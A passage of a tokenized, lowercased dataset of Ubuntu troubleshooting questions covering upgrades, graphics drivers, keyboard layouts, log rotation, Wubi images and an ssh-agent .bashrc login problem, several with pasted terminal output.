irq:42 ioport:2000 ( size=256 ) memory : f1804000-f1804fff memory : f1800000-f1803fff
130380	changing file permission for ntfsâ format	i am trying to change the file/directory permission . but it is not changing either through using command line or gui . this fil/dir is present in one of the partition in external harddisk which is in ntfs file format . dees that make any difference ? any help how could i modify the permissions in this case . thanks !
130383	how do i configure mediawiki on ec2 if anonymous browsing is disabled ?	so i have new mediawiki instance install on a brand new amazon ec2 instances . all is going swimmingly , until i have to log in via the web browser to configure it . since i 'm running on a hosted server , i ca n't hit http : //localhost/mediawiki/config/index.php like the instructions say to . if i try to hit it via http : // < my ip address > /mediawiki/config/index.php , my browser just tries to download the file because anonymous browsing is n't enabled . i seem to be before localsettings.php is created , so i do n't know how to move forward from here .
130384	update is not working for me ( i am on 11.10 )	it 's been one week i am trying everything nothing is working . i tryed to upgrade ubuntu from 11.10 to 12.10 . i tried the update manager but no sucess . i also tried update-manager -d not working i tried sudo update-manager -d not working i tried sudo release-upgrade not working sudo apt-get update not working sudo apt-get upgrade not working too so basically i am trying everything . in update manager , i did put the option for updating any version . and i am on 11.10 ubuntu . so what else i can do ? this is making me crazy . copy of the terminal bellow . please can anyone can help me ? ps : i do have update , but for runtime , c+ etc ... ( even today 15 updates about 11.10 ) but nothing about the new release . and i do not have a cd player for updating . administrator @ bang007 : ~ $ do-release-upgrade checking for a new ubuntu release no new release found administrator @ bang007 : ~ $ sudo update-manager -d [ sudo ] password for administrator : ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gtk-warning ** : attempting to add a widget with type aptdaemon+gtk3widgets+aptprogressdialog to a gtkwindow , but as a gtkbin subclass a gtkwindow can only contain one widget at a time ; it already contains a widget of type gtkvbox ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 97 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , at /usr/share/perl5/debconf/frontend/gnome.pm line 103 . ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gtk-warning ** : attempting to add a widget with type aptdaemon+gtk3widgets+aptprogressdialog to a gtkwindow , but as a gtkbin subclass a gtkwindow can only contain one widget at a time ; it already contains a widget of type gtkvbox ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed ( update-manager:10612 ) : gdk-critical ** : gdk_window_get_pointer : assertion `gdk_is_window ( window ) ' failed administrator @ bang007 : ~ $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? administrator @ bang007 : ~ $ sudo -apt-get update usage : sudo -h | -k | -k | -l | -v usage : sudo -v [ -akns ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] usage : sudo -l [ l ] [ -akns ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name ] [ -u user name| # uid ] [ -g groupname| # gid ] [ command ] usage : sudo [ -abehknps ] [ -c fd ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] [ -g groupname| # gid ] [ var=value ] [ -i|-s ] [ < command > ] usage : sudo -e [ -akns ] [ -c fd ] [ -g groupname| # gid ] [ -p prompt ] [ -u user name| # uid ] file ... administrator @ bang007 : ~ $ sudo apt-get update ign : //extras.ubuntu.com oneiric inrelease ign : //archive.canonical.com oneiric inrelease ign : //gb.archive.ubuntu.com oneiric inrelease ign : //gb.archive.ubuntu.com oneiric-updates inrelease ign hp : //gb.archive.ubuntu.com oneiric-backports inrelease hit htp : //archive.canonical.com oneiric release.gpg hit htp : //extras.ubuntu.com oneiric release.gpg ign htp : //ppa.launchpad.net oneiric inrelease ign ttp : //gb.archive.ubuntu.com oneiric-security inrelease ign ttp : //gb.archive.ubuntu.com oneiric-proposed inrelease hit ttp : //archive.canonical.com oneiric release hit htp : //extras.ubuntu.com oneiric release hit ttp : //gb.archive.ubuntu.com oneiric release.gpg hit ttp : //gb.archive.ubuntu.com oneiric-updates release.gpg hit ttp : //ppa.launchpad.net oneiric release.gpg hit ttp : //gb.archive.ubuntu.com oneiric-backports release.gpg hit ttp : //gb.archive.ubuntu.com oneiric-security release.gpg hit ttp : //gb.archive.ubuntu.com oneiric-proposed release.gpg hit ttp : //gb.archive.ubuntu.com oneiric release hit ttp : //gb.archive.ubuntu.com oneiric-updates release hit ttp : //gb.archive.ubuntu.com oneiric-backports release hit ttp : //ppa.launchpad.net oneiric release hit ttp : //gb.archive.ubuntu.com oneiric-security release hit ttp : //gb.archive.ubuntu.com oneiric-proposed release hit ttp : //archive.canonical.com oneiric/partner sources hit ttp : //archive.canonical.com oneiric/partner i386 packages ign ttp : //archive.canonical.com oneiric/partner translationindex hit ttp : //extras.ubuntu.com oneiric/main sources hit ttp : //gb.archive.ubuntu.com oneiric/restricted sources hit ttp : //extras.ubuntu.com oneiric/main i386 packages ign ttp : //extras.ubuntu.com oneiric/main translationindex hit ttp : //gb.archive.ubuntu.com oneiric/main sources hit ttp : //gb.archive.ubuntu.com oneiric/multiverse sources hit ttp : //gb.archive.ubuntu.com oneiric/universe sources hit ttp : //gb.archive.ubuntu.com oneiric/main i386 packages hit ttp : //gb.archive.ubuntu.com oneiric/restricted i386 packages hit ttp : //gb.archive.ubuntu.com oneiric/universe i386 packages hit ttp : //gb.archive.ubuntu.com oneiric/multiverse i386 packages hit ttp : //gb.archive.ubuntu.com oneiric/main translationindex hit ttp : //gb.archive.ubuntu.com oneiric/multiverse translationindex hit ttp : //gb.archive.ubuntu.com oneiric/restricted translationindex hit ttp : //gb.archive.ubuntu.com oneiric/universe translationindex hit htp : //gb.archive.ubuntu.com oneiric-updates/restricted sources hit htp : //gb.archive.ubuntu.com oneiric-updates/main sources hit htp : //gb.archive.ubuntu.com oneiric-updates/multiverse sources hit htp : //gb.archive.ubuntu.com oneiric-updates/universe sources hit htp : //gb.archive.ubuntu.com oneiric-updates/main i386 packages hit htp : //gb.archive.ubuntu.com oneiric-updates/restricted i386 packages hit htp : //gb.archive.ubuntu.com oneiric-updates/universe i386 packages hit htp : //gb.archive.ubuntu.com oneiric-updates/multiverse i386 packages hit htp : //gb.archive.ubuntu.com oneiric-updates/main translationindex hit htp : //gb.archive.ubuntu.com oneiric-updates/multiverse translationindex hit htp : //gb.archive.ubuntu.com oneiric-updates/restricted translationindex hit htp : //gb.archive.ubuntu.com oneiric-updates/universe translationindex get:1 ttp : //gb.archive.ubuntu.com oneiric/main translation-en_gb [ 69.0 kb ] hit htp : //ppa.launchpad.net oneiric/main sources hit htp : //ppa.launchpad.net oneiric/main i386 packages ign htp : //ppa.launchpad.net oneiric/main translationindex ign htp : //archive.canonical.com oneiric/partner translation-en_gb ign htp : //archive.canonical.com oneiric/partner translation-en hit htp : //gb.archive.ubuntu.com oneiric/main translation-en get:2 ttp : //gb.archive.ubuntu.com oneiric/multiverse translation-en_gb [ 68.5 kb ] hit htp : //gb.archive.ubuntu.com oneiric/multiverse translation-en get:3 ttp : //gb.archive.ubuntu.com oneiric/restricted translation-en_gb [ 1,937 b ] hit htp : //gb.archive.ubuntu.com oneiric/restricted translation-en get:4 ttp : //gb.archive.ubuntu.com oneiric/universe translation-en_gb [ 4,365 b ] hit htp : //gb.archive.ubuntu.com oneiric/universe translation-en hit htp : //gb.archive.ubuntu.com oneiric-updates/main translation-en hit htp : //gb.archive.ubuntu.com oneiric-updates/multiverse translation-en hit htp : //gb.archive.ubuntu.com oneiric-updates/restricted translation-en ign htp : //extras.ubuntu.com oneiric/main translation-en_gb hit htp : //gb.archive.ubuntu.com oneiric-updates/universe translation-en hit htp : //gb.archive.ubuntu.com oneiric-backports/main sources hit htp : //gb.archive.ubuntu.com oneiric-backports/restricted sources hit htp : //gb.archive.ubuntu.com oneiric-backports/universe sources hit htp : //gb.archive.ubuntu.com oneiric-backports/multiverse sources hit htp : //gb.archive.ubuntu.com oneiric-backports/main i386 packages hit ttp : //gb.archive.ubuntu.com oneiric-backports/restricted i386 packages hitttp : //gb.archive.ubuntu.com oneiric-backports/universe i386 packages hit ttp : //gb.archive.ubuntu.com oneiric-backports/multiverse i386 packages ign ttp : //extras.ubuntu.com oneiric/main translation-en hit ttp : //gb.archive.ubuntu.com oneiric-backports/main translationindex hit ttp : //gb.archive.ubuntu.com oneiric-backports/multiverse translationindex hit ttp : //gb.archive.ubuntu.com oneiric-backports/restricted translationindex hit ttp : //gb.archive.ubuntu.com oneiric-backports/universe translationindex hit ttp : //gb.archive.ubuntu.com oneiric-security/restricted sources hit ttp : //gb.archive.ubuntu.com oneiric-security/main sources hit ttp : //gb.archive.ubuntu.com oneiric-security/multiverse sources hit ttp : //gb.archive.ubuntu.com oneiric-security/universe sources hit ttp : //gb.archive.ubuntu.com oneiric-security/main i386 packages hit ttp : //gb.archive.ubuntu.com oneiric-security/restricted i386 packages hit ttp : //gb.archive.ubuntu.com oneiric-security/universe i386 packages hit ttp : //gb.archive.ubuntu.com oneiric-security/multiverse i386 packages hit ttp : //gb.archive.ubuntu.com oneiric-security/main translationindex hit ttp : //gb.archive.ubuntu.com oneiric-security/multiverse translationindex hit ttp : //gb.archive.ubuntu.com oneiric-security/restricted translationindex hitht p : //gb.archive.ubuntu.com oneiric-security/universe translationindex hit ttp : //gb.archive.ubuntu.com oneiric-proposed/restricted sources hit ttp : //gb.archive.ubuntu.com oneiric-proposed/main sources hithtp : //gb.archive.ubuntu.com oneiric-proposed/multiverse sources hit tp : //gb.archive.ubuntu.com oneiric-proposed/universe sources hit tp : //gb.archive.ubuntu.com oneiric-proposed/restricted i386 packages hit tp : //gb.archive.ubuntu.com oneiric-proposed/main i386 packages hit ttp : //gb.archive.ubuntu.com oneiric-proposed/multiverse i386 packages hit ttp : //gb.archive.ubuntu.com oneiric-proposed/universe i386 packages hit ttp : //gb.archive.ubuntu.com oneiric-proposed/main translationindex hit ttp : //gb.archive.ubuntu.com oneiric-proposed/multiverse translationindex hit ttp : //gb.archive.ubuntu.com oneiric-proposed/restricted translationindex hit ttp : //gb.archive.ubuntu.com oneiric-proposed/universe translationindex hit ttp : //gb.archive.ubuntu.com oneiric-backports/main translation-en hit ttp : //gb.archive.ubuntu.com oneiric-backports/multiverse translation-en hit ttp : //gb.archive.ubuntu.com oneiric-backports/restricted translation-en hit ttp : //gb.archive.ubuntu.com oneiric-backports/universe translation-en hit ttp : //gb.archive.ubuntu.com oneiric-security/main translation-en hit ttp : //gb.archive.ubuntu.com oneiric-security/multiverse translation-en hit ttp : //gb.archive.ubuntu.com oneiric-security/restricted translation-en hit ttp : //gb.archive.ubuntu.com oneiric-security/universe translation-en hit ttp : //gb.archive.ubuntu.com oneiric-proposed/main translation-en hit ttp : //gb.archive.ubuntu.com oneiric-proposed/multiverse translation-en hit ttp : //gb.archive.ubuntu.com oneiric-proposed/restricted translation-en hit ttp : //gb.archive.ubuntu.com oneiric-proposed/universe translation-en ign ttp : //ppa.launchpad.net oneiric/main translation-en_gb ignttp : //ppa.launchpad.net oneiric/main translation-en fetched 144 kb in 0s ( 199 kb/s ) reading package lists ... done w : duplicate sources.list entry htp : //archive.canonical.com/ubuntu/ oneiric/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_oneiric_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems administrator @ bang007 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . administrator @ bang007 : ~ $ sudo do-release-upgrade checking for a new ubuntu release no new release found administrator @ bang007 : ~ $
130388	kern.log y syslog crecen demasiado / kern.log and syslog grow too much	primero felicitaciones , y gracias , ubuntu 12.04 , es , impresionante , e impecable . ahora tengo esta pregunta , los archivos /var/log/kern.log y syslog crecen demasiado , mas de lo que he visto habitualmente , ¿que puede ser ? . y estaría bien si los pongo a rotar después de que pesen 256 mb , o bien no pesen mucho . si es así , con el programa logrotate , ¿como se hace para que roten según el tamaño ? . bueno espero que me puedan explicar , y yo uso ubuntu 12.04 desktop 32 bit . y gracias google translate first congratulations , and thanks , ubuntu 12.04 , is impeccable . now i have this question , the /var/log/kern.log and syslog grow too much , but from what i 've seen usually , what could it be ? . and it would be nice if i put them to rotate after weighing 256 mb , or do not weigh much . if so , the logrotate program can do that ? , how is made to rotate by size ? . well i hope i can explain , and i use ubuntu 12.04 desktop 32 bit . many thanks
130392	how to install ubuntu on uefi enabled hp pavilion hpe h9 tower	i just bought a hp pavilion hpe h9 phoenix ( i7 , 8gb ram , 126 ssd & 2x500gb sata ) and wanted to install ubuntu 12.04 on it . but the computer seemed to be uefi protected . so i turned this feature off in the bios . then i succeeded to enter the conf menu in the live usb/cd mode ( set language with f2 , keyboard layout with f3 , etc ) . i then launched the option to try ubuntu without installing , but nothing happened : just a black screen . is it due to the uefi/efi protection ? is this tower motherboard protected ? does anyone have an idea about how to install any 'buntu on this tower or any uefi protected pc ? it is the first time something like this happend to meâś i think i went through 100 of 'buntu installations before . i ca n't `` live '' without itâś @ + thanks
130393	how to configure the touchpad middle click ?	in almost all the large modern linux distributions and in the last releases of ubuntu-based distributions the touchpad was configured out of the box to have right , left and middle clicks and you could configure them easily . the middle click is usually done with a two or three-finger tap . in ubuntu 12.04 i have n't seen where to enable the middle click and it is not enabled by default .
130399	x does n't start after upgrade from 11.10 to 12.04	i 'm trying to upgrade from 11.10 to 12.04 . i was making the upgrade over the x session of 11.10 i386 . i was in the middle of the instalation when the x freezed . so i 've made a reboot . when it restarted , i was already in 12.04 version but with the black screen problem . so i 've added nomodeset to grub options . i 've runned the commands : sudo apt-get upgrade sudo apt-get dist-upgrade in order to install the missing packages ( because of the x freeze ) . in total the commands installed/upgraded about 1gb more . but no x yet . so i 've uninstalled the fglrx packages and tried to install the amd ati ( vendor ) package . it give some errors ( compilation errors ) so i 've cleaned it up and reinstalled the fglrx and fglrx-amdcccle ubuntu packages . current problem : no x , yet . when i run the command : apt-get install fglrx fglrx-amdcccle a strange output happens ( related to link group i386-linux-gnu_gl_conf ) : reading package lists ... building dependency tree ... reading state information ... the following new packages will be installed : fglrx fglrx-amdcccle 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/45.1 mb of archives . after this operation , 129 mb of additional disk space will be used . selecting previously unselected package fglrx . ( reading database ... ( reading database ... 5 % [ ... ] ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 483649 files and directories currently installed . ) unpacking fglrx ( from ... /fglrx_2 % 3a8.960-0ubuntu1_i386.deb ) ... selecting previously unselected package fglrx-amdcccle . unpacking fglrx-amdcccle ( from ... /fglrx-amdcccle_2 % 3a8.960-0ubuntu1_i386.deb ) ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up fglrx ( 2:8.960-0ubuntu1 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl64.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl64.icd ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group i386-linux-gnu_gl_conf is broken . update-alternatives : warning : skip creation of /etc/opencl/vendors/amdocl64.icd because associated file /usr/lib/fglrx/etc/opencl/vendors/amdocl64.icd ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist . update-alternatives : using /usr/lib/fglrx/alt_ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode . update-initramfs : deferring update ( trigger activated ) loading new fglrx-8.960 dkms files ... first installation : checking all kernels ... building only for 3.2.0-24-generic-pae building for architecture i686 building initial module for 3.2.0-24-generic-pae done . fglrx : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.2.0-24-generic-pae/updates/dkms/ depmod ... ... . dkms : install completed . update-initramfs : deferring update ( trigger activated ) processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up fglrx-amdcccle ( 2:8.960-0ubuntu1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-24-generic-pae processing triggers for libc-bin ... ldconfig deferred processing now taking place but it seems to install correctly and compiled all the modules to the current kernel . runned the commmand : aticonfig -- initial -f after reboot , still no x . i tried to run the x with no fglrx drivers and with . i spend a lot of time on this problem and i really wonder if i can solve it widthout reinstalling ubuntu from scratch . other info : uname -a linux [ name ] 3.2.0-24.generic-pae # 37-ubuntu smp wed apr 25 10:47:59 utc 2012 i686 i686 i368 lspci 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler [ amd radeon hd 6600m series ] xorg.0.log [ 24.741 ] x.org x server 1.11.3 release date : 2011-12-16 [ 24.741 ] x protocol version 11 , revision 0 [ 24.741 ] build operating system : linux 2.6.42-23-generic i686 ubuntu [ 24.741 ] current operating system : linux beatsaudio 3.2.0-24-generic-pae # 37-ubuntu smp wed apr 25 10:47:59 utc 2012 i686 [ 24.741 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-24-generic-pae root=uuid=dab0cc0d-adaa-4a14-a633-b2f9841935ff ro quiet splash nomodeset vt.handoff=7 [ 24.741 ] build date : 20 april 2012 05:12:21am [ ... .. ] [ 28.283 ] 0 : /usr/bin/x ( xorg_backtrace+0x37 ) [ 0xb7724627 ] [ 28.283 ] 1 : /usr/bin/x ( 0xb759c000+0x18c3aa ) [ 0xb77283aa ] [ 28.283 ] 2 : ( vdso ) ( __kernel_rt_sigreturn+0x0 ) [ 0xb757940c ] [ 28.283 ] 3 : /lib/i386-linux-gnu/libc.so.6 ( 0xb71d9000+0x135d32 ) [ 0xb730ed32 ] [ 28.283 ] 4 : /usr/bin/x ( xichangedeviceproperty+0x16c ) [ 0xb76bcafc ] [ 28.283 ] 5 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0xb4a25000+0x634e ) [ 0xb4a2b34e ] [ 28.283 ] 6 : /usr/lib/xorg/modules/input/evdev_drv.so ( 0xb4a25000+0x6595 ) [ 0xb4a2b595 ] [ 28.283 ] 7 : /usr/bin/x ( activatedevice+0x66 ) [ 0xb75c82e6 ] [ 28.284 ] 8 : /usr/bin/x ( 0xb759c000+0x8cc05 ) [ 0xb7628c05 ] [ 28.284 ] 9 : /usr/bin/x ( 0xb759c000+0x9b142 ) [ 0xb7637142 ] [ 28.284 ] 10 : /usr/bin/x ( 0xb759c000+0x9b9b3 ) [ 0xb76379b3 ] [ 28.284 ] 11 : /usr/bin/x ( config_init+0x14 ) [ 0xb7636a14 ] [ 28.284 ] 12 : /usr/bin/x ( initinput+0xfd ) [ 0xb7616edd ] [ 28.284 ] 13 : /usr/bin/x ( 0xb759c000+0x2524e ) [ 0xb75c124e ] [ 28.284 ] 14 : /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0xb71f24d3 ] [ 28.284 ] 15 : /usr/bin/x ( 0xb759c000+0x255e9 ) [ 0xb75c15e9 ] [ 28.284 ] segmentation fault at address 0xf3 [ 28.284 ] caught signal 11 ( segmentation fault ) . server aborting [ 28.284 ] please consult the the x.org foundation support at for help . [ 28.284 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 28.284 ] [ 28.288 ] ( ii ) evdev : power button : close [ 28.288 ] ( ii ) unloadmodule : `` evdev '' [ 28.288 ] ( ii ) unloading evdev [ 28.292 ] ( ii ) evdev : video bus : close [ 28.292 ] ( ii ) unloadmodule : `` evdev '' [ 28.292 ] ( ii ) unloading evdev [ 28.308 ] ( ii ) evdev : video bus : close [ 28.308 ] ( ii ) unloadmodule : `` evdev '' [ 28.308 ] ( ii ) unloading evdev [ 28.312 ] ( ii ) evdev : power button : close [ 28.312 ] ( ii ) unloadmodule : `` evdev '' [ 28.312 ] ( ii ) unloading evdev [ 28.312 ] ( ii ) unloadmodule : `` evdev '' [ 28.312 ] ( ii ) unloading evdev [ 28.664 ] ddxsiggiveup : closing log [ 28.664 ] server terminated with error ( 1 ) . closing log file . can you please help ?
130402	what 's a good alternative to nvidia 's proprietary drivers for a gf119	i have a thinkpad t520 with switchable ( optimus ) graphics . the integrated card is intel , which works great , but wo n't drive a dvi monitor . the computer also have an nvidia gf119 ( quadro nvs 4200m ) which i can set the computer to use full-time in the bios . the problem is , the driver in nvidia-current is awful . it does n't support xrandr or compositing extensions ; i have to configure my monitors using its awful gui app , then restart x server and hope for the best . without the proprietary driver , linux and x seem to be defaulting to a vga display . is there an alternative way to use my nvidia gpu without using its awful drivers ?
130403	`` recent files '' entries via command line apps ?	i process lots of files via the command line , e.g . using my own shell or python scripts . is there an easy way to add the files that i manipulate to the unity `` recent files '' list so i can then easily access them via the unity dash ?
130408	can i mount a wubi .disk image in a new wubi installation ?	i 've bricked my ubuntu wubi installation and as a result i ca n't get to the log-in screen . the computer sits at a blank , off-black ( that kinda deep red/brown ) screen after i 've selected which kernel to boot . is there any way i can install a fresh copy of ubuntu via wubi and then mount the old image ?
130413	russian phonetic keyboard layout	the keyboard layout gui in 12.04 system settings is not responding on my laptop . in a different post a workaround was found ( see : can not switch keyboard layouts ) . problem now : having manually altered the file /etc/default/keyboard i can now access all the keyboard layouts i want except for one : russian phonetic . ( i.e . the letters are placed where the equivalent latin letters are - qwerty ) this keyboard was in the old gnome and it is still listed in the `` system settings '' keyboard gui . but the gui is not responding . i can toggle between the official russian keyboard and norwegian with the command : sudo setxkbmap -option grp : alt_shift_toggle no , ru but `` ru phonetic '' is not understood . what is the code for the phonetic russian keyboard ?
130414	ubuntu in virtualbox in dropbox or cloud ?	i would like to have a virtual machine of ubuntu , that i can access everywhere , without having to carry my virtual hd , could i put the vhd on something like dropbox or google drive and use it there ? is this practical ? because as far as i know whenever i update the file , it will be uploaded to dropbox or google drive or other cloud services , and if i run a os it is gon na keep using updating the vhd file ... . is this idea practical ?
130418	what to do about .ssh-agent pop up at login screen ?	i was setting up git with a ssh key passphrase on ubuntu 12.04 via the terminal with the assistance of help.github : `` you can run ssh-agent automatically when you open bash by adding the following to your ~/.profile or ~/.bashrc file '' i added the ~/.bashrc file : ssh_env= '' $ home/.ssh/environment '' # start the ssh-agent function start_agent { echo `` initializing new ssh agent ... '' # spawn ssh-agent ssh-agent | sed 's/^echo/ # echo/ ' > `` $ ssh_env '' echo succeeded chmod 600 `` $ ssh_env '' . `` $ ssh_env '' > /dev/null ssh-add } # test for identities function test_identities { # test whether standard identities have been added to the agent already ssh-add -l | grep `` the agent has no identities '' > /dev/null if [ $ ? -eq 0 ] ; then ssh-add # $ ssh_auth_sock broken so we start a new proper agent if [ $ ? -eq 2 ] ; then start_agent fi fi } # check for running ssh-agent with proper $ ssh_agent_pid if [ -n `` $ ssh_agent_pid '' ] ; then ps -ef | grep `` $ ssh_agent_pid '' | grep ssh-agent > /dev/null if [ $ ? -eq 0 ] ; then test_identities fi # if $ ssh_agent_pid is not properly set , we might be able to load one from # $ ssh_env else if [ -f `` $ ssh_env '' ] ; then . `` $ ssh_env '' > /dev/null fi ps -ef | grep `` $ ssh_agent_pid '' | grep -v grep | grep ssh-agent > /dev/null if [ $ ? -eq 0 ] ; then test_identities else start_agent fi fi a little later i restarted my computer . now , whenever i attempt to log on ( i.e . enter my password and press enter at the login screen ) as the sole user ( as opposed to guest ) the screen goes black and a pop-up appears asking me for my /.ssh/rsa_id passphrase . when i enter the passphrase i entered for github , ubuntu throws me back to the login screen , square one . the only way i know how else to login functionally is as a guest . what has happened and what can i do to fix this ?
